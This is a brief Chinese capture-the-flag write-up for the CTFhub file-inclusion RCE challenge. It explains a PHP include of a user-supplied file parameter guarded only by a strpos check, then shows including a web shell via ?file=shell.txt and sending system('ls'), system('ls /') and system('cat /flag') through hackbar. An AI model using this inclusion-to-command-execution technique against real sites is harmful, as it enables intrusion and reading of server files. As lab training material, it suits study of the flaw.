CTFhub-RCE-文件包含

访问网站

我们仔细看一下php代码，重点是

if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];

这里有一个strpos(string,find,start)函数

意思在string字符串中找find的位置,start是查找的开始位置

那么这句代码的意思就是如果file中没有flag字符串就执行下面的include $_GET["file"]

否则就输出Hacker。
点击shell ：

是将ctfhub传的参数用php执行

题目的目的也是让我们执行shell木马那么我们就 

        在网站后输入：

?file=shell.txt

        shell中要传的参数为  ctfhub=system("ls");    （hackbar  的 body 的参数）

                                                     点击   hackbar 中的

接着返回上一级目录，发现flag: ctfhub=system("ls /");

                        ​​​​​​​                ​​​​​​​        ​​​​​​​       点击  hackbar 中的

接下来打开flag :   ctfhub=system("cat /flag");

                                                          点击 hackbar 中的